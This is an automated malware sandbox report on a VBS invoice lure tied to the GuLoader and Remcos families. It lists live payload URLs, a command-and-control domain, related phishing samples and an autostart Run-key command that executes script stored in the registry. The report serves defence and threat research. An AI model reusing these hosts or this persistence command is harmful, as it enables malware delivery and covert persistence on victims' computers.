http://103.195.237.43/Outgassed.emz	0%	Avira URL Cloud	safe
https://contemega.com.do/Out	0%	Avira URL Cloud	safe
http://103.195.237.43/Outgassed.emz	14%	Virustotal		Browse
http://103.195.237.43/Outg	0%	Avira URL Cloud	safe
http://103.195.237.4	0%	Avira URL Cloud	safe
https://contemega.com.do/	0%	Avira URL Cloud	safe
https://contemega.com.do/Outgassed.em	0%	Avira URL Cloud	safe
http://103.195.237.43/QJqDH201.bin	0%	Avira URL Cloud	safe
http://103.195.237.4	0%	Virustotal		Browse
http://103.195.237.43/Outgas	0%	Avira URL Cloud	safe
https://contemega.com.do/Outgas	0%	Avira URL Cloud	safe
https://contemega.com.do/Outgassed.e	0%	Avira URL Cloud	safe
http://103.1	0%	Avira URL Cloud	safe
https://contemega.com.do/Outgassed.emz	0%	Avira URL Cloud	safe
https://contemega.com.do/	2%	Virustotal		Browse
http://103.195.237.43/QJqDH201.binEyessVescontemega.com.do/QJqDH201.bin	0%	Avira URL Cloud	safe
http://103.195	0%	Avira URL Cloud	safe
http://103.1	0%	Virustotal		Browse
http://103.195.237.	0%	Avira URL Cloud	safe
https://contemega.com.	0%	Avira URL Cloud	safe
http://103.195.237.43	0%	Avira URL Cloud	safe
http://103.195.237.43/QJqDH201.binTq	0%	Avira URL Cloud	safe
https://contemega.com.do/Outgassed.emz	6%	Virustotal		Browse
https://contemega.co	0%	Avira URL Cloud	safe
https://contemega.P	0%	Avira URL Cloud	safe
http://103.195.237.43	12%	Virustotal		Browse
http://103.195.237.43/Outgassed.emzX	0%	Avira URL Cloud	safe
http://103.195.237.	0%	Virustotal		Browse
http://103.195.237.43/QJqDH201.bin	14%	Virustotal		Browse
http://103.195	0%	Virustotal		Browse
http://103.195.237.43/Ou	0%	Avira URL Cloud	safe
http://103.195.237.43/QJqDH201.binV	0%	Avira URL Cloud	safe
https://contemega.com.do/Outga	0%	Avira URL Cloud	safe
http://103.195.237	0%	Avira URL Cloud	safe
http://103.195.237.43/Outgasse	0%	Avira URL Cloud	safe
http://103.195.237.43/Out	0%	Avira URL Cloud	safe
https://contemega.com.do/Outg	0%	Avira URL Cloud	safe
http://103.195.237.43/Outgass	0%	Avira URL Cloud	safe
https://github.com/Pester/Pester	0%	Avira URL Cloud	safe
http://103.195.237	0%	Virustotal		Browse
http://103.195.237.43/O	0%	Avira URL Cloud	safe
http://103.195.23	0%	Avira URL Cloud	safe
http://contemega.com.do	0%	Avira URL Cloud	safe
http://103.195.237.43/Outgassed.	0%	Avira URL Cloud	safe
http://103.195.237.43/;	0%	Avira URL Cloud	safe
http://103.195.2	0%	Avira URL Cloud	safe
http://103.195.237.43/	0%	Avira URL Cloud	safe
https://contemega.com.do/Outgassed	0%	Avira URL Cloud	safe
https://contemega.com	0%	Avira URL Cloud	safe
http://103.195.237.43/Outgassed.e	0%	Avira URL Cloud	safe
http://103.195.237.43/Outgassed	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
janbours92harbu02.duckdns.org	206.123.148.198	true	true	11%, Virustotal, Browse	unknown
contemega.com.do	192.185.112.252	true	false	2%, Virustotal, Browse	unknown
janbours92harbu03.duckdns.org	unknown	unknown	true	7%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
janbours92harbu02.duckdns.org	true	11%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://103.195.237.43/QJqDH201.bin	false	14%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://contemega.com.do/Outgassed.emz	false	6%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://contemega.com.do/Outgassed.	powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://103.19	powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://103.195.237.43/Outgassed.em	powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contemega.com.do/Ou	powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contemega.com.d	powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://103.195.	powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://contemega.com.do/O	powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contemega.c	powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/License	powershell.exe, 00000004.00000002.2301952677.000000000569A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contemega.com.do/Outgass	powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contemega.com.do	powershell.exe, 00000001.00000002.2386862644.00000170242A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2386862644.0000017022C25000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://103.195.237.43/Outga	powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contemega.com.do/Outgasse	powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://103.195.237.43/Outgassed.emz	powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2299590839.0000000004787000.00000004.00000800.00020000.00000000.sdmp	false	14%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://contemega.com.do/Out	powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://103.195.237.43/Outg	powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contemega.com.do/	powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://103.195.237.4	powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://contemega.com.do/Outgassed.em	powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://103.195.237.43/Outgas	powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/pscore6lB	powershell.exe, 00000004.00000002.2299590839.0000000004631000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contemega.com.do/Outgas	powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contemega.com.do/Outgassed.e	powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://103.1	powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://103.195.237.43/QJqDH201.binEyessVescontemega.com.do/QJqDH201.bin	wab.exe, 0000000A.00000002.2974055601.0000000021870000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/	powershell.exe, 00000004.00000002.2301952677.000000000569A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000001.00000002.2481281446.0000017032A72000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2301952677.000000000569A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://103.195	powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://103.195.237.	powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://contemega.com.	powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://103.195.237.43	powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	false	12%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://103.195.237.43/QJqDH201.binTq	wab.exe, 0000000A.00000002.2961771384.0000000005F38000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000001.00000002.2386862644.0000017022A01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2299590839.0000000004631000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contemega.co	powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contemega.P	powershell.exe, 00000001.00000002.2386862644.00000170247CA000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://103.195.237.43/Outgassed.emzX	powershell.exe, 00000001.00000002.2386862644.00000170242A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2386862644.0000017022C25000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000001.00000002.2481281446.0000017032A72000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2301952677.000000000569A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contemega.com.do/Outga	powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000004.00000002.2299590839.0000000004787000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://103.195.237.43/Ou	powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000004.00000002.2299590839.0000000004787000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://go.micro	powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://103.195.237.43/Outgasse	powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://103.195.237.43/QJqDH201.binV	wab.exe, 0000000A.00000002.2961771384.0000000005F38000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000004.00000002.2301952677.000000000569A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://103.195.237	powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://103.195.237.43/Out	powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contemega.com.do/Outg	powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://103.195.237.43/Outgass	powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000004.00000002.2299590839.0000000004787000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://103.195.237.43/O	powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://103.195.23	powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://contemega.com.do	powershell.exe, 00000001.00000002.2386862644.00000170247CF000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://103.195.237.43/Outgassed.	powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://103.195.237.43/;	wab.exe, 0000000A.00000002.2961771384.0000000005F99000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://103.195.2	powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://103.195.237.43/	powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2961771384.0000000005F99000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/pscore68	powershell.exe, 00000001.00000002.2386862644.0000017022A01000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contemega.com.do/Outgassed	powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contemega.com	powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://103.195.237.43/Outgassed.e	powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://103.195.237.43/Outgassed	powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
103.195.237.43	unknown	Viet Nam	38733	CMCTELECOM-AS-VNCMCTelecomInfrastructureCompanyVN	false
206.123.148.198	janbours92harbu02.duckdns.org	United States	9009	M247GB	true
192.185.112.252	contemega.com.do	United States	46606	UNIFIEDLAYER-AS-1US	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1465860
Start date and time:	2024-07-02 07:46:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 10s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Maersk_BL_Invoice_Packinglist.vbs
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winVBS@17/10@4/3
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Successful, ratio: 74% Number of executed functions: 47 Number of non-executed functions: 23
Cookbook Comments:	Found application associated with file extension: .vbs

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 93.184.221.240
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 4412 because it is empty
Execution Graph export aborted for target powershell.exe, PID 6540 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
01:46:57	API Interceptor	1x Sleep call for process: wscript.exe modified
01:47:01	API Interceptor	103x Sleep call for process: powershell.exe modified
01:48:35	API Interceptor	12719x Sleep call for process: wab.exe modified
06:47:55	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Startup key %Salvings% -w 1 $Urbanities=(Get-ItemProperty -Path 'HKCU:\Pardo\').Krecar;%Salvings% ($Urbanities)
06:48:03	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Startup key %Salvings% -w 1 $Urbanities=(Get-ItemProperty -Path 'HKCU:\Pardo\').Krecar;%Salvings% ($Urbanities)

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
103.195.237.43	Revised Invoice 7389293.vbs	Get hash	malicious	GuLoader, Remcos	Browse	103.195.237.43/Nyet.qxd
	Maersk_BL_Invoice_Packinglist.vbs	Get hash	malicious	GuLoader, Remcos	Browse	103.195.237.43/uPjMJXcuf244.bin
	Deutschepost Invoice & Awb0000000.vbs	Get hash	malicious	GuLoader, Remcos	Browse	103.195.237.43/Finansloves203.mix
	Transaction_Execution_Confirmation_000000.vbs	Get hash	malicious	GuLoader, Remcos	Browse	103.195.237.43/DQIbgxck76.bin
	DHL Shipping Invoice, Bill Of Lading & AWB.vb.vbs	Get hash	malicious	GuLoader, Remcos	Browse	103.195.237.43/HqExDVYd37.bin
	MaerskPreawbsamedaydelivery636489384759390200.vbs	Get hash	malicious	GuLoader, Remcos	Browse	103.195.237.43/Stttepillens34.pcx
	DHL Shipping Invoice, Bill Of Lading & AWB.vbs	Get hash	malicious	GuLoader	Browse	103.195.237.43/Abatua.dsp
	DHL Shipping Invoices & Awb.vbs	Get hash	malicious	GuLoader	Browse	103.195.237.43/Castellated18.aca
	DHL_Shipping_Invoice_Awb_pdf.vbs	Get hash	malicious	GuLoader	Browse	103.195.237.43/Biltong19.ocx
	Swift MT103 Payment Confirmation_pdf.vbs	Get hash	malicious	GuLoader	Browse	103.195.237.43/Unplunderously.cur
206.123.148.198	Revised Invoice 7389293.vbs	Get hash	malicious	GuLoader, Remcos	Browse
192.185.112.252	DHL Shipping Document Awb & BL.vbs	Get hash	malicious	GuLoader, Remcos	Browse
	TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbs	Get hash	malicious	GuLoader, Remcos	Browse
	DHL Shipping Document Awb & BL.vbs	Get hash	malicious	GuLoader	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
janbours92harbu02.duckdns.org	Revised Invoice 7389293.vbs	Get hash	malicious	GuLoader, Remcos	Browse	206.123.148.198
	DHL Shipping Document Awb & BL.vbs	Get hash	malicious	GuLoader, Remcos	Browse	206.123.148.194
	TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbs	Get hash	malicious	GuLoader, Remcos	Browse	206.123.148.194
	Maersk_BL_Invoice_Packinglist.vbs	Get hash	malicious	GuLoader, Remcos	Browse	206.123.148.194
	DHL Shipping Invoice & Awb8289djuejeeoffffdelivery.vbs	Get hash	malicious	GuLoader, Remcos	Browse	206.123.148.194
	Deutschepost Invoice & Awb0000000.vbs	Get hash	malicious	GuLoader, Remcos	Browse	206.123.148.194
	Transaction_Execution_Confirmation_000000.vbs	Get hash	malicious	GuLoader, Remcos	Browse	206.123.148.196
	DHL Shipping Invoice, Bill Of Lading & AWB.vb.vbs	Get hash	malicious	GuLoader, Remcos	Browse	206.123.148.194
	MaerskPreawbsamedaydelivery636489384759390200.vbs	Get hash	malicious	GuLoader, Remcos	Browse	206.123.148.194
	DHL_Shipping_Invoice_Awb_0000000.vbs	Get hash	malicious	GuLoader, Remcos	Browse	194.55.186.124
contemega.com.do	DHL Shipping Document Awb & BL.vbs	Get hash	malicious	GuLoader, Remcos	Browse	192.185.112.252
	TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbs	Get hash	malicious	GuLoader, Remcos	Browse	192.185.112.252
	DHL Shipping Document Awb & BL.vbs	Get hash	malicious	GuLoader	Browse	192.185.112.252

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CMCTELECOM-AS-VNCMCTelecomInfrastructureCompanyVN	Revised Invoice 7389293.vbs	Get hash	malicious	GuLoader, Remcos	Browse	103.195.237.43
	Maersk_BL_Invoice_Packinglist.vbs	Get hash	malicious	GuLoader, Remcos	Browse	103.195.237.43
	Deutschepost Invoice & Awb0000000.vbs	Get hash	malicious	GuLoader, Remcos	Browse	103.195.237.43
	Transaction_Execution_Confirmation_000000.vbs	Get hash	malicious	GuLoader, Remcos	Browse	103.195.237.43
	DHL Shipping Invoice, Bill Of Lading & AWB.vb.vbs	Get hash	malicious	GuLoader, Remcos	Browse	103.195.237.43
	MaerskPreawbsamedaydelivery636489384759390200.vbs	Get hash	malicious	GuLoader, Remcos	Browse	103.195.237.43
	DHL Shipping Invoice, Bill Of Lading & AWB.vbs	Get hash	malicious	GuLoader	Browse	103.195.237.43
	DHL Shipping Invoices & Awb.vbs	Get hash	malicious	GuLoader	Browse	103.195.237.43
	DHL_Shipping_Invoice_Awb_pdf.vbs	Get hash	malicious	GuLoader	Browse	103.195.237.43
	Swift MT103 Payment Confirmation_pdf.vbs	Get hash	malicious	GuLoader	Browse	103.195.237.43
M247GB	Revised Invoice 7389293.vbs	Get hash	malicious	GuLoader, Remcos	Browse	206.123.148.198
	8hd98EhtIFcYkb8.exe	Get hash	malicious	FormBook	Browse	38.207.19.49
	DHL Shipping Document Awb & BL.vbs	Get hash	malicious	GuLoader, Remcos	Browse	206.123.148.194
	TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbs	Get hash	malicious	GuLoader, Remcos	Browse	206.123.148.194
	invoice-72717953897646054572255005658360083176291774189023-quiltercheviot.pdf	Get hash	malicious	HTMLPhisher	Browse	38.132.122.254
	Maersk_BL_Invoice_Packinglist.vbs	Get hash	malicious	GuLoader, Remcos	Browse	206.123.148.194
	BviOG97ArX.elf	Get hash	malicious	Mirai, Moobot	Browse	173.211.86.129
	DCwYFBy6z7.elf	Get hash	malicious	Mirai, Moobot	Browse	38.204.196.215
	DHL Shipping Invoice & Awb8289djuejeeoffffdelivery.vbs	Get hash	malicious	GuLoader, Remcos	Browse	206.123.148.194
	Deutschepost Invoice & Awb0000000.vbs	Get hash	malicious	GuLoader, Remcos	Browse	206.123.148.194
UNIFIEDLAYER-AS-1US	mirai.mips.elf	Get hash	malicious	Mirai	Browse	192.163.243.130
	https://acrobat.adobe.com/id/urn:aaid:sc:va6c2:4050cd23-db02-4b91-ab92-8d433723d20e	Get hash	malicious	HTMLPhisher	Browse	69.49.245.172
	http://url2530.tvsmotor.com/ls/click?upn=u001.smInq0-2BkNc5oRshkzMLE7U6zcio2-2F9zwu1ZIXUanV0NJI-2BOrcqj0f4SCu-2B-2BWZYRJ5WulbQ5i5mBsK1zXEak-2FiMRG64aR-2FUGiDgoHteplEfqii9y-2FZm8OviJTU1sjmz7jpaYlxIO-2FZqsCEMZLobIAuBKqKOl6jqYqSAHVwBkUZuGRzhvuesvLIb-2BOJaFEug0CuPML-2Fk7hkFuRgQZCNn13gFjxpvaK7BszvLf1FNgQSAGEcVOyFo5OkKyCTWVX8CFkHH2058S5Ahgs6702chswQ27i8fTIQhwmMoXYoEJ6NorF1VpAe0oJx35gDOEfSC0fALEr8V3cxNwqqHdyN8bubmjrpvt-2BbFbnZ-2FstXl8vxTAGFM6mTwmzfEL-2B-2BGu2lufzB8M21afC0TTeqSa7QFFyNA-3D-3DHBPv_PfC-2BSFtj-2BSSQFBPv0NgAOXDpcsq6LADHKWdyLdLAzrKwVahhFR76hhions4TwBL9F6a4eQ738jeLIeY9r1OOXohTZTeZE0n2g2t6fycMpA0TJOA8sXK8mZcOXs-2BnNqbr4W7O00eI9WZrnuIrYT3RIDO-2BEHvZtO2YjJnjDLiBUb-2B7QOSPTNUmcSEPbCN9-2Bq0u5dYWTd9AfzNX553r2GVUOxBO0VYIry3r2htr0J03Czo-3D	Get hash	malicious	HTMLPhisher	Browse	108.179.252.159
	NiAsQEhh9p.elf	Get hash	malicious	Mirai	Browse	142.7.172.89
	DHL Shipping Document Awb & BL.vbs	Get hash	malicious	GuLoader, Remcos	Browse	192.185.112.252
	yVtOz1fD5G.exe	Get hash	malicious	AgentTesla	Browse	162.241.62.63
	F46VBJ6Yvy.exe	Get hash	malicious	AgentTesla	Browse	192.254.225.136
	8w5wHh755H.exe	Get hash	malicious	AgentTesla	Browse	192.185.143.105
	TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbs	Get hash	malicious	GuLoader, Remcos	Browse	192.185.112.252
	MV RIVA WIND - VESSEL's PARTICULARS.PDF.scr.exe	Get hash	malicious	AgentTesla	Browse	50.87.144.157

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	Roblox Account Manager.exe	Get hash	malicious	Unknown	Browse	192.185.112.252
	Roblox Account Manager.exe	Get hash	malicious	Unknown	Browse	192.185.112.252
	https://hamids-worker.hamidyousefi93.workers.dev/	Get hash	malicious	Unknown	Browse	192.185.112.252
	https://worker-lingering-frost-51ba.mhmdy000918.workers.dev/	Get hash	malicious	Unknown	Browse	192.185.112.252
	http://pub-72f4175190054b068a6db1f116f55ca9.r2.dev/index.html	Get hash	malicious	Unknown	Browse	192.185.112.252
	https://telegrambot-resolved.pages.dev/	Get hash	malicious	Unknown	Browse	192.185.112.252
	http://excelonline.standard.us-east-1.oortech.com/Index.html	Get hash	malicious	Unknown	Browse	192.185.112.252
	setup.exe	Get hash	malicious	RedLine	Browse	192.185.112.252
	http://pub-893c14dc386a432a9e359033c230e2e4.r2.dev/index.html	Get hash	malicious	Unknown	Browse	192.185.112.252
	http://nvbvnco.com/9EBS7MZK4HT3FKQCINV8CO6YFH/login	Get hash	malicious	Unknown	Browse	192.185.112.252

Process:	C:\Windows\System32\wscript.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	71954
Entropy (8bit):	7.996617769952133
Encrypted:	true
SSDEEP:	1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
MD5:	49AEBF8CBD62D92AC215B2923FB1B9F5
SHA1:	1723BE06719828DDA65AD804298D0431F6AFF976
SHA-256:	B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
SHA-512:	BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..\|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........\|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.\|.c.&>?..^t. ..;..X.d.E.0G....[Q.,......#.Dp..L.o\|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

